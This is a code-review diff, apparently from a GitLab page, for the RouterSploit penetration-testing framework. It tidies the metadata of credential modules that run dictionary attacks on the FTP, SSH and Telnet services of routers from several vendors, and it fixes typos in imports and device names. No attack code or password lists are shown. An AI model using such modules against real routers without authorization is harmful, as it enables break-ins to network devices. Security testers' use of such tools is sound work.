)
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Belkin Router Default FTP Creds", "name": "Belkin Router Default FTP Creds",
"description": "Module performs dictionary attack against Belkin Router FTP service. " "description": "Module performs dictionary attack against Belkin Router FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Belkin Router", "Belkin Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Belkin Router Default SSH Creds", "name": "Belkin Router Default SSH Creds",
"description": "Module performs dictionary attack against Belkin Router SSH service. " "description": "Module performs dictionary attack against Belkin Router SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Belkin Router", "Belkin Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Belkin Router Telnet Creds", "name": "Belkin Router Telnet Creds",
"description": "Module performs dictioanry attack against Belkin Router Telnet service. " "description": "Module performs dictioanry attack against Belkin Router Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Belkin Router", "Belkin Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Billion Router Default FTP Creds", "name": "Billion Router Default FTP Creds",
"description": "Module performs dictionary attack against Billion Router FTP service. " "description": "Module performs dictionary attack against Billion Router FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Billion Router", "Billion Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Billion Router Default SSH Creds", "name": "Billion Router Default SSH Creds",
"description": "Module performs dictionary attack against Billion Router SSH service. " "description": "Module performs dictionary attack against Billion Router SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Billion Router", "Billion Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Billion Router Default Telnet Creds", "name": "Billion Router Default Telnet Creds",
"description": "Module performs dictionary attack against Billion Router Telnet service. " "description": "Module performs dictionary attack against Billion Router Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Billion Router", "Billion Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -11,7 +11,7 @@ class Exploit(FTPDefault): ...@@ -11,7 +11,7 @@ class Exploit(FTPDefault):
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
), ),
"devices": ( "devices": (
"Cisc Router", "Cisco Router",
), ),
} }
......
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telne_default import Exploit as TelnetDefault from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault): class Exploit(TelnetDefault):
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Mikrotik Router Default FTP Creds", "name": "Mikrotik Router Default FTP Creds",
"description": "Module performs dictionary attack against Mikrotik Router FTP service." "description": "Module performs dictionary attack against Mikrotik Router FTP service."
"If valid credentials are found they are displayed to the user.", "If valid credentials are found they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Mikrotik Router", "Mikrotik Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Mikrotik Router Default SSH Creds", "name": "Mikrotik Router Default SSH Creds",
"description": "Module performs dictionary attack against Mikrotik Router SSH service." "description": "Module performs dictionary attack against Mikrotik Router SSH service."
"If valid credentials are found they are displayed to the user.", "If valid credentials are found they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Mikrotik Router", "Mikrotik Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Mikrotik Router Default Telnet Creds", "name": "Mikrotik Router Default Telnet Creds",
"description": "Module performs dictionary attack against Mikrotik Router Telnet service." "description": "Module performs dictionary attack against Mikrotik Router Telnet service."
"If valid credentials are found they are displayed to the user.", "If valid credentials are found they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Mikrotik Router", "Mikrotik Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Movistar Router Default FTP Creds", "name": "Movistar Router Default FTP Creds",
"description": "Module performs dictionary attack against Movistar Router FTP service." "description": "Module performs dictionary attack against Movistar Router FTP service."
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Movistar Router", "Movistar Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Movistar Router Default SSH Creds", "name": "Movistar Router Default SSH Creds",
"description": "Module performs dictionary attack against Movistar Router SSH service." "description": "Module performs dictionary attack against Movistar Router SSH service."
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Movistar Router", "Movistar Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
from rotersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Movistar Router Default Telnet Creds", "name": "Movistar Router Default Telnet Creds",
"description": "Module performs dictionary attack against Movistar Router Telnet service." "description": "Module performs dictionary attack against Movistar Router Telnet service."
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Movistar Router", "Movistar Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Netcore Router Default FTP Creds", "name": "Netcore Router Default FTP Creds",
"description": "Module performs dictionary attack against Netcore Router FTP service." "description": "Module performs dictionary attack against Netcore Router FTP service."
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Netcore Router", "Netcore Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Netcore Router Default SSH Creds", "name": "Netcore Router Default SSH Creds",
"description": "Module performs dictionary attack against Netcore Router SSH service." "description": "Module performs dictionary attack against Netcore Router SSH service."
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Netcore Router", "Netcore Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Netcore Router Default Telnet Creds", "name": "Netcore Router Default Telnet Creds",
"description": "Module performs dictionary attack against Netcore Router Telnet service." "description": "Module performs dictionary attack against Netcore Router Telnet service."
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Netcore Router", "Netcore Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Netgear Router Default FTP Creds", "name": "Netgear Router Default FTP Creds",
"description": "Module performs dictionary attack against Netgear Router FTP service. " "description": "Module performs dictionary attack against Netgear Router FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Netgear Router", "Netgear Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Netgear Router Default SSH Creds", "name": "Netgear Router Default SSH Creds",
"description": "Module performs dictionary attack against Netgear Router SSH service. " "description": "Module performs dictionary attack against Netgear Router SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Netgear Router", "Netgear Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Netgear Router Default Telnet Creds", "name": "Netgear Router Default Telnet Creds",
"description": "Module performs dictionary attack against Netgear Router Telnet service. " "description": "Module performs dictionary attack against Netgear Router Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Netgear Router", "Netgear Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Netsys Router Default FTP Creds", "name": "Netsys Router Default FTP Creds",
"description": "Module performs dictionary attack against Netsys Router FTP service. " "description": "Module performs dictionary attack against Netsys Router FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"device": [ "devices": (
"Netsys Router", "Netsys Router",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment